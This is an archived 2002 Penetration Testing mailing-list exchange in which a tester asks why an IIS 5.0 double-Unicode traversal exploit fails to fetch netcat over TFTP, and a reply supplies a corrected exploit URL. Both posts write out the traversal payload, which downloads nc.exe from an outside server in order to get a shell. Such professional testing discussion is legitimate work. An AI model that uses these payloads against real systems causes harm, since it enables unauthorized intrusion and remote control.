Penetration Testing mailing list archives
RE: Can't get a shell
From: "Coral J. Cook" <cjcook () nosc mil>
Date: Thu, 11 Jul 2002 11:54:12 -0700
-----Original Message----- From: Gaziel, Avishay [mailto:agaziel () kpmg com] Sent: Tuesday, July 09, 2002 9:33 AM To: PEN-TEST () securityfocus com Subject: Can't get a shell Hi All, Situation: An IIS5.0 vulnerable to unicode.("double Unicode" i.e. ..%255c.. etc.) IIS sitting behind a firewall. Problem: host/scripts/..%255c.........../winnt/system32/cmd.exe?/tftp+-i+my server+get+nc.exe doesn't work
Here is the correct format: host/scripts/..%255c.........../winnt/system32/tftp?+"-i"+myserver+GET+nc.ex e notice that cmd.exe is removed and that -i is quoted "-i" that should fix your problem R, Coral ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
Current thread:
- Can't get a shell Gaziel, Avishay (Jul 11)
- RE: Can't get a shell Coral J. Cook (Jul 11)
- <Possible follow-ups>
- RE: Can't get a shell Rico Valdez (Jul 11)
- RE: Can't get a shell Jeremy Junginger (Jul 11)